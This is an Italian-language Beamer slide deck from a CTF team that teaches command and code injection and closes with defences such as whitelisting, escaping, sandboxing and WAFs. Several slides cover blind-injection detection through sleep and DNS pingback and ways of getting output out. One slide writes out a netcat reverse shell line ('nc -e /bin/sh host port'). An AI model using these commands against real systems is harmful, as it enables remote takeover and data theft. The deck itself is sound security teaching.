\documentclass[aspectratio=169]{beamer}

\usepackage{tikz}
\usepackage[utf8]{inputenc}
\usepackage{listings}
\usepackage{comment}
\usepackage{amsmath}
\usepackage{upquote}
\usepackage{wasysym}
\usepackage{hyperref}

\usetikzlibrary{positioning}
\usetheme{ulisse}

\title{Command and Code Injections}
\author{\href{https://ulis.se/ctfteam/}{Andrea Giovine}}
\date{March 2021}
\lstset {
    basicstyle=\footnotesize,
    keywordstyle=\color{ulissered}
}

\lstset{language=Python, showstringspaces=false, columns=fullflexible}

\begin{document}
    \begin{frame}
        \titlepage
    \end{frame}

	\begin{frame}
        \frametitle{License}
            \begin{center}
                Released under CC-BY-SA License\\
                \vspace*{1cm}
                \includegraphics[width=.8\textwidth]{CC-BY-SA_icon_svg}
                \\
                \vspace*{1cm}
                \url{https://creativecommons.org/licenses/by-sa/4.0/}
            \end{center}
    \end{frame}
    
    \begin{frame}
        \frametitle{Introduzione}
        \begin{itemize}
            \item Command/Code Injections sono una famiglia di vulnerabilità dove l’input utente insicuro e non sanitificato viene eseguito/interpretato dall’applicazione.
            \item Il risultato di tale vulnerabilità può portare a compromettere la confidenzialità, l’integrità e la disponibilità dei dati.
        \end{itemize}
    \end{frame}
    
    \begin{frame}
        \frametitle{Introduzione}
        \begin{tabular}{cl}  
            \begin{tabular}{c}
                \includegraphics[scale=0.3]{OWASP Top 10-2017 (en).png}
            \end{tabular}
         & \begin{tabular}{l}
          \parbox{0.5\linewidth}{%
                \begin{enumerate}
                    \item Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
                \end{enumerate}
                }
            \end{tabular}
        \end{tabular}
    \end{frame}
    
    \begin{frame}
        \frametitle{Introduzione}
        Command/Code Injections possono accadere molto frequentemente se ad esempio l’applicazione
        \begin{itemize}
            \item Usa programmi esterni (es: ImageMagick)
            \item Valuta codice dinamicamente (es: eval)
        \end{itemize}
    \end{frame}
    
    \begin{frame}
        \frametitle{Command Injection}
        Un esempio molto facile ed intuitivo per capire la problematica è il seguente: \newline
        immaginate di passare dall’applicazione web direttamente input alla shell di sistema.
        \vfill
        \lstinputlisting[language=Python, frame = single, breaklines, basicstyle=\scriptsize]{Injection.py}
    \end{frame}
    
     \begin{frame}
        \frametitle{Command Injection}
        Ovviamente il comportamento pensato dallo sviluppatore era semplicemente di listare il contenuto di una certa cartella. \newline
        Non essendoci nessun tipo di sanitificazione dell’input, un utente malintenzionato potrebbe intuire la presenza della vulnerabilità ed usarla a suo vantaggio.
    \end{frame}
    
    \begin{frame}
        \frametitle{Command Injection}
        Siccome Bash ed altri linguaggi di scripting interpretando il carattere ‘;’ come separatore di comandi tutto quello che viene dopo può essere eseguito come nel esempio: \newline
       \lstinputlisting[language=Python, frame = single, breaklines, basicstyle=\scriptsize]{InjectionCommand.py}
    \end{frame}
    
    \begin{frame}
        \frametitle{Command Injection}
        In Bash possiamo usare anche altri caratteri oltre al ‘;’ come ad esempio:
        \begin{itemize}
            \item Separatore di linea(‘\n’)
            \item Operatori logici(‘ \&\& \| $’)
        \end{itemize}
        
        Un altro modo per iniettare comandi da eseguire in remoto può essere sfruttare la command substitution
        \textdollar(comando) oppure con il backtick `comando`
    \end{frame}
    
    \begin{frame}
        \frametitle{Command Injection}
        Come possiamo capire con cosa abbiamo a che fare? I classici approcci alla risoluzione di problemi ci possono tornare utili:
        \begin{itemize}
            \item WhiteBox
            \item BlackBox
        \end{itemize}
    \end{frame}
    
    \begin{frame}
        \frametitle{Command Injection}
        BlackBox cerchiamo di scatenare degli errori per capire se il programma usa software esterni, analizziamo il flusso logico del programma.
    \end{frame}
    
     \begin{frame}
        \frametitle{Command Injection}
        WhiteBox abbiamo il codice quindi una bella analisi statica del codice cercando i soliti sospetti (Exec, System, Popen, backticks)
    \end{frame}
    
    \begin{frame}
        \frametitle{Command Injection}
        Scovare un Command Injection con metodologia BlackBox può essere lungo e frustrante specialmente se non abbiamo l’output come possiamo ovviare a questa problematica?
        \begin{itemize}
            \item Usare Sleep
            \item Usare il Pingback
        \end{itemize}
    \end{frame}
    
    \begin{frame}{Frame Title}
        \frametitle{Command Injection}
        Primo approccio: potremmo far fare all'applicazione vittima una sleep, il risultato da parte dell'attaccante è avere una richiesta che rimane appesa per un certo periodo di tempo, in questo modo può sapere se l'injection è andata a buon fine
    \end{frame}
    
     \begin{frame}{Frame Title}
        \frametitle{Command Injection}
        Secondo approccio: l'attaccante ha un macchina esposta nel mondo dove poter verificare le connessioni che gli arrivano. \newline
        Il flusso di esecuzione prevede che una volta effettuata l'injection questa faccia ad esempio ping su una macchina del malintenzionato affinché questo possa verificare l’attacco.
    \end{frame}
    
    \begin{frame}
        \frametitle{Command Injection}
        Siccome molti Firewall bloccano i messaggi ICMP (ping) oppure hanno delle policy molto stringenti per le connessioni, possiamo sfruttare i DNS {\huge \smiley{} } \newline
        La tecnica si chiama DNS pingback e come il precedente ma usando dei servizi possiamo vedere se dalla macchina compromessa della vittima possiamo eseguire query al DNS. \newline
        \center \url{http://requestbin.net/dns}
    \end{frame}
    
    \begin{frame}
        \frametitle{Command Injection}
        Come otteniamo l’output ? \newline
        Se non abbiamo l’output viene detta che la command Injection è blind; \newline
        Potremmo mettere il nostro output in un file pubblicamente accessibile tramite la bash potremmo fare ad esempio \newline
        \lstinputlisting[frame = single, breaklines, basicstyle=\scriptsize]{BashEx.sh}
        Dove lo possiamo mettere? i soliti sospetti:
        
        \begin{itemize}
            \item directory dei file statici del web server
            \item cartella dello user dei file di upload (qui è previsto che lo user ci scriva quindi cosa potrebbe andare storto?) 
        \end{itemize}
    \end{frame}
    
     \begin{frame}
        \frametitle{Command Injection}
         Come otteniamo l’output ? \newline
         Potremmo usare una connessione out-of-bound. Reverse Shell? \newline
        nc -e /bin/sh host port \newline
        non abbiamo nc? {\huge \smiley{} } \newline
        \lstinputlisting[frame = single, breaklines, basicstyle=\scriptsize]{RevShell.sh}
    \end{frame}
    
    \begin{frame}
        \frametitle{Code Injection}
        Il concetto è lo stesso ma sfruttiamo l’interprete del linguaggio per eseguire codice lecito, questo fa si che il problema sia dipendente dal tipo di linguaggio usato. \newline
        Questo perché nell’applicazione web qualcuno ha usato costrutti tipo: \newline
        \begin{itemize}
            \item assert
            \item eval
            \item evaluate
        \end{itemize}
    \end{frame}
    
    \begin{frame}
          \frametitle{Possibili soluzioni}
          \begin{itemize}
              \item L’input dell’utente non deve poter essere inserito in funzioni di sistema
              \item Non fate generare codice dinamicamente in base all'input dell’utente
          \end{itemize}
    \end{frame}
    
    \begin{frame}
          \frametitle{Possibili soluzioni}
          Se proprio non possiamo farne a meno validiamo l’input dell’utente
            \begin{itemize}
                \item Usiamo delle whitelist per definire solo ciò che si può fare
                \item Usiamo funzioni proprie del linguaggio per fare l’escape dei caratteri speciali
            \end{itemize}
    \end{frame}
    
     
    \begin{frame}
          \frametitle{Possibili soluzioni}
          Un altra opzione è usare delle sandbox in fase di deploy ma il problema persiste perchè potrebbe essere possibile fare escaping dalla sandbox. \newline
        p.s una sandbox è un enviroment dove può essere eseguito del codice in maniere fortemente limitata. Esempio non ci sono molti tool di sistema etcc
    \end{frame}
    
    \begin{frame}
          \frametitle{Possibili soluzioni}
          Ultima strada potrebbe essere usare un WAF (Web Application Firewall) \newline
          Questo filtra, monitora e blocca il traffico HTTP da e verso un'applicazione Web. Un WAF si differenzia da un normale firewall in quanto un WAF è in grado di filtrare il contenuto di specifiche applicazioni Web mentre i firewall regolari fungono da gate di sicurezza tra i server. (Operano su livelli diversi dello stack) \newline
        Ispezionando il traffico HTTP, è possibile prevenire gli attacchi derivanti da falle nella sicurezza delle applicazioni Web, come iniezione SQL, script tra siti (XSS), inclusione di file e configurazioni errate di sicurezza.
    \end{frame}
    
    \begin{frame}
    \center \huge Domande?
    \end{frame}
    
\end{document}
